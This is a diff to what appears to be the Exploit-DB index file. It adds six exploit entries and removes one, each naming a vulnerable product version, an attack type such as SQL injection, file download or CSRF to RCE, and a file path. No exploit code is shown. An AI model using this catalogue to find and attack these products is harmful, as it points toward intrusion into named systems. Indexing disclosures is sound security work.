
@@ -11339,7 +11339,6 @@ id,file,description,date,author,type,platform,port
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,
-49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows,
 49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",2021-05-17,SlidingWindow,local,windows,
@@ -44294,3 +44293,9 @@ id,file,description,date,author,type,platform,port
 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php,
 50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass & RCE",2021-07-28,"Javier Olmedo",webapps,php,
 50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",2021-07-28,"Sedric Louissaint",webapps,windows,
+50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",2021-07-29,"Ivan Nikolsky",webapps,hardware,
+50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",2021-07-29,LiquidWorm,webapps,hardware,
+50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",2021-07-29,LiquidWorm,webapps,aspx,
+50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",2021-07-29,securityforeveryone.com,webapps,php,
+50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2021-07-29,niebardzo,webapps,java,
+50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,